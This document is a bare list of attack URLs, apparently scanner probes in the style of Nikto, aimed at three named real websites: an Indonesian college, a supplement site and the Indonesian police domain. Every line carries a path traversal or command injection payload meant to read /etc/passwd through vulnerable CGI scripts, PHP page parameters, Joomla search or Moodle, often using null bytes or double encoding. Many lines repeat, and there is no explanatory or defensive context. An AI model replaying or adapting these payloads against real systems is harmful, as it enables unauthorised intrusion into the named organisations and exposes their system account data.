staialhidayahbogor.ac.id/cgi-bin/csNewsPro.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')
staialhidayahbogor.ac.id/cgi-bin/calendar_admin.pl?config=|cat%20/etc/passwd|
staialhidayahbogor.ac.id//index.php?page=..///////..////..//////etc/passwd
staialhidayahbogor.ac.id/cgi-bin/htmpl_admin.cgi?help=|cat
staialhidayahbogor.ac.id/cgi-bin/csGuestBook.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')
staialhidayahbogor.ac.id//index.php?page=../../../etc/passwd
staialhidayahbogor.ac.id/cgi-bin/bslist.cgi?email=x;cat%20/etc/passwd
staialhidayahbogor.ac.id//index.php?page=%252e%252e%252fetc%252fpasswd
staialhidayahbogor.ac.id//etc/passwd
staialhidayahbogor.ac.id/shop/normal_html.cgi?file=;cat%20/etc/passwd|
staialhidayahbogor.ac.id/index.php?option=com_search&Itemid=1&searchword=%22%3Bsystem(cat%20/etc/passwd)%3B
staialhidayahbogor.ac.id/cgi-bin/handler/netsonar;cat
staialhidayahbogor.ac.id/mods/apage/apage.cgi?f=file.htm.|cat
staialhidayahbogor.ac.id/cgi-bin/af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd
staialhidayahbogor.ac.id/cgi-bin/csLiveSupport.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')
staialhidayahbogor.ac.id//index.php?page=....//....//etc/passwd
staialhidayahbogor.ac.id//index.php?page=../../../../../../../../../etc/passwd..\.\.\.\.\.\.\.\.\.\.\[ADD
staialhidayahbogor.ac.id/cgi-bin/FileSeek2.cgi?head=;cat%20/etc/passwd|&foot=
staialhidayahbogor.ac.id//etc/passwd|
staialhidayahbogor.ac.id/shop/normal_html.cgi?file=|cat%20/etc/passwd|
staialhidayahbogor.ac.id/cgi-bin/shopplus.cgi?dn=domainNikto.com&cartid=%CARTID%&file=;cat%20/etc/passwd|
staialhidayahbogor.ac.id/cgi-bin/gbook/gbook.cgi?_MAILTO=xx;cat%20/etc/passwd
staialhidayahbogor.ac.id/cgi-bin/shop.pl/page=;cat%20/etc/passwd|
staialhidayahbogor.ac.id/moodle/filter/tex/texed.php?formdata=foo&pathname=foo";cat+/etc/passwd;echo+"
staialhidayahbogor.ac.id/cgi-bin/smartsearch.cgi?keywords=|cat%20/etc/passwd|
staialhidayahbogor.ac.id/gravity/library/setup/rpc.php?objectname=system("cat%20/etc/passwd");die
staialhidayahbogor.ac.id/cgi-bin/FileSeek2.cgi?head=&foot=;cat%20/etc/passwd
staialhidayahbogor.ac.id/cgi-bin/calendar/calendar_admin.pl?config=|cat%20/etc/passwd|
staialhidayahbogor.ac.id//etc/passwd|?data=Download
staialhidayahbogor.ac.id/cgi-bin/alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd
staialhidayahbogor.ac.id/logbook.pl?file=../../../../../../../bin/cat%20/etc/passwd%00|
staialhidayahbogor.ac.id/cgi-bin/guestbook.cgi?user=cpanel&template=|cat%20/etc/passwd|
staialhidayahbogor.ac.id/perl/-e%20%22system('cat%20/etc/passwd');\\%22
staialhidayahbogor.ac.id/cgi-bin/webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;cat%20/etc/passwd|&CODE=PHOLD
staialhidayahbogor.ac.id/shop/member_html.cgi?file=;cat%20/etc/passwd|
staialhidayahbogor.ac.id/cgi-bin/dose.pl?daily&somefile.txt&|cat
staialhidayahbogor.ac.id/cgi-bin/book.cgi?action=default&current=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10
staialhidayahbogor.ac.id/cgi-bin/FileSeek.cgi?head=&foot=;cat%20/etc/passwd
staialhidayahbogor.ac.id/cgi-bin/eshop.pl/seite=;cat%20/etc/passwd|
staialhidayahbogor.ac.id/cgi-bin/publisher/search.cgi?dir=jobs&template=;cat%20/etc/passwd|&output_number=10
staialhidayahbogor.ac.id/cgi-bin/pfdisplay.cgi?'%0A/bin/cat%20/etc/passwd|'
staialhidayahbogor.ac.id/cgi-bin/csSearch.cgi?command=savesetup&setup=`cat%20/etc/passwd`
staialhidayahbogor.ac.id/cgi-bin/bsguest.cgi?email=x;cat%20/etc/passwd
staialhidayahbogor.ac.id/cgi-bin/shopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;cat%20/etc/passwd|
staialhidayahbogor.ac.id/cgi-bin/pfdispaly.cgi?'%0A/bin/cat%20/etc/passwd|'
staialhidayahbogor.ac.id//index.php?page=%252e%252e%252fetc%252fpasswd%00
staialhidayahbogor.ac.id//index.php?page=../../../etc/passwd%00
staialhidayahbogor.ac.id/cgi-bin/smartsearch/smartsearch.cgi?keywords=|cat%20/etc/passwd|
staialhidayahbogor.ac.id/cgi-bin/common/listrec.pl?APP=qmh-news&TEMPLATE=;cat%20/etc/passwd|
staialhidayahbogor.ac.id//index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd
staialhidayahbogor.ac.id/cgi-bin/FileSeek.cgi?head=;cat%20/etc/passwd|&foot=
staialhidayahbogor.ac.id/shop/member_html.cgi?file=|cat%20/etc/passwd|
staialhidayahbogor.ac.id/cgi-bin/pollit/Poll_It_SSI_v2.0.cgi?data_dir=\\etc\\passwd%00
staialhidayahbogor.ac.id/cgi-bin/bsguest.cgi?email=x;cat%20/etc/passwd
staialhidayahbogor.ac.id/cgi-bin/gbook/gbook.cgi?_MAILTO=xx;cat%20/etc/passwd
staialhidayahbogor.ac.id/cgi-bin/pollit/Poll_It_SSI_v2.0.cgi?data_dir=\\etc\\passwd%00
staialhidayahbogor.ac.id/mods/apage/apage.cgi?f=file.htm.|cat
staialhidayahbogor.ac.id//etc/passwd|?data=Download
staialhidayahbogor.ac.id/shop/normal_html.cgi?file=;cat%20/etc/passwd|
staialhidayahbogor.ac.id/cgi-bin/af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd
staialhidayahbogor.ac.id/cgi-bin/publisher/search.cgi?dir=jobs&template=;cat%20/etc/passwd|&output_number=10
staialhidayahbogor.ac.id/cgi-bin/calendar/calendar_admin.pl?config=|cat%20/etc/passwd|
staialhidayahbogor.ac.id/cgi-bin/csNewsPro.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')
staialhidayahbogor.ac.id/cgi-bin/csGuestBook.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')
staialhidayahbogor.ac.id/cgi-bin/smartsearch/smartsearch.cgi?keywords=|cat%20/etc/passwd|
staialhidayahbogor.ac.id/cgi-bin/smartsearch.cgi?keywords=|cat%20/etc/passwd|
staialhidayahbogor.ac.id/cgi-bin/csLiveSupport.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')
staialhidayahbogor.ac.id/cgi-bin/htmpl_admin.cgi?help=|cat
staialhidayahbogor.ac.id/cgi-bin/bslist.cgi?email=x;cat%20/etc/passwd
staialhidayahbogor.ac.id/shop/normal_html.cgi?file=|cat%20/etc/passwd|
staialhidayahbogor.ac.id/cgi-bin/shopplus.cgi?dn=domainNikto.com&cartid=%CARTID%&file=;cat%20/etc/passwd|
staialhidayahbogor.ac.id//index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd
staialhidayahbogor.ac.id/cgi-bin/calendar_admin.pl?config=|cat%20/etc/passwd|
staialhidayahbogor.ac.id/cgi-bin/webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;cat%20/etc/passwd|&CODE=PHOLD
staialhidayahbogor.ac.id/moodle/filter/tex/texed.php?formdata=foo&pathname=foo";cat+/etc/passwd;echo+"
staialhidayahbogor.ac.id/cgi-bin/pfdisplay.cgi?'%0A/bin/cat%20/etc/passwd|'
staialhidayahbogor.ac.id/perl/-e%20%22system('cat%20/etc/passwd');\\%22
staialhidayahbogor.ac.id/cgi-bin/handler/netsonar;cat
staialhidayahbogor.ac.id/cgi-bin/common/listrec.pl?APP=qmh-news&TEMPLATE=;cat%20/etc/passwd|
staialhidayahbogor.ac.id/cgi-bin/alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd
staialhidayahbogor.ac.id/shop/member_html.cgi?file=|cat%20/etc/passwd|
staialhidayahbogor.ac.id/cgi-bin/dose.pl?daily&somefile.txt&|cat
staialhidayahbogor.ac.id/cgi-bin/shopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;cat%20/etc/passwd|
staialhidayahbogor.ac.id/logbook.pl?file=../../../../../../../bin/cat%20/etc/passwd%00|
staialhidayahbogor.ac.id/shop/member_html.cgi?file=;cat%20/etc/passwd|
staialhidayahbogor.ac.id/cgi-bin/FileSeek2.cgi?head=;cat%20/etc/passwd|&foot=
staialhidayahbogor.ac.id/cgi-bin/FileSeek2.cgi?head=&foot=;cat%20/etc/passwd
staialhidayahbogor.ac.id//index.php?page=../../../etc/passwd
staialhidayahbogor.ac.id//etc/passwd|
staialhidayahbogor.ac.id/cgi-bin/eshop.pl/seite=;cat%20/etc/passwd|
staialhidayahbogor.ac.id/cgi-bin/guestbook.cgi?user=cpanel&template=|cat%20/etc/passwd|
staialhidayahbogor.ac.id//index.php?page=../../../../../../../../../etc/passwd..\.\.\.\.\.\.\.\.\.\.\[ADD
staialhidayahbogor.ac.id//etc/passwd|
staialhidayahbogor.ac.id//index.php?page=../../../etc/passwd%00
staialhidayahbogor.ac.id//index.php?page=%252e%252e%252fetc%252fpasswd
staialhidayahbogor.ac.id/cgi-bin/FileSeek.cgi?head=&foot=;cat%20/etc/passwd
staialhidayahbogor.ac.id//index.php?page=%252e%252e%252fetc%252fpasswd%00
staialhidayahbogor.ac.id/cgi-bin/pfdispaly.cgi?'%0A/bin/cat%20/etc/passwd|'
staialhidayahbogor.ac.id//index.php?page=..///////..////..//////etc/passwd
staialhidayahbogor.ac.id/cgi-bin/csChatRBox.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')
staialhidayahbogor.ac.id//index.php?page=....//....//etc/passwd
staialhidayahbogor.ac.id/gravity/library/setup/rpc.php?objectname=system("cat%20/etc/passwd");die
staialhidayahbogor.ac.id/cgi-bin/ezshopper/loadpage.cgi?user_id=1&file=|cat%20/etc/passwd|
staialhidayahbogor.ac.id/cgi-bin/simple/view_page?mv_arg=|cat%20/etc/passwd|
staialhidayahbogor.ac.id/cgi-bin/FileSeek.cgi?head=;cat%20/etc/passwd|&foot=
staialhidayahbogor.ac.id/cgi-bin/book.cgi?action=default&current=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10
staialhidayahbogor.ac.id/cgi-bin/shop.pl/page=;cat%20/etc/passwd|
staialhidayahbogor.ac.id/cgi-bin/csSearch.cgi?command=savesetup&setup=`cat%20/etc/passwd`
staialhidayahbogor.ac.id//etc/passwd
staialhidayahbogor.ac.id/index.php?option=com_search&Itemid=1&searchword=%22%3Bsystem(cat%20/etc/passwd)%3B
realsupplementadvisor.com/mods/apage/apage.cgi?f=file.htm.|cat
realsupplementadvisor.com/perl/-e%20%22system('cat%20/etc/passwd');\\%22
realsupplementadvisor.com/cgi-bin/htmpl_admin.cgi?help=|cat
realsupplementadvisor.com/cgi-bin/shop.pl/page=;cat%20/etc/passwd|
realsupplementadvisor.com//etc/passwd|
realsupplementadvisor.com//etc/passwd|?data=Download
realsupplementadvisor.com/cgi-bin/dose.pl?daily&somefile.txt&|cat
realsupplementadvisor.com/cgi-bin/handler/netsonar;cat
realsupplementadvisor.com//etc/passwd
realsupplementadvisor.com/cgi-bin/eshop.pl/seite=;cat%20/etc/passwd|
https://polri.go.id//index.php?page=....//....//etc/passwd
https://polri.go.id//index.php?page=..///////..////..//////etc/passwd
https://polri.go.id//index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd
https://polri.go.id//index.php?page=../../../etc/passwd
https://polri.go.id//index.php?page=../../../../../../../../../etc/passwd..\.\.\.\.\.\.\.\.\.\.\[ADD
https://polri.go.id//index.php?page=%252e%252e%252fetc%252fpasswd%00
https://polri.go.id//index.php?page=../../../etc/passwd%00
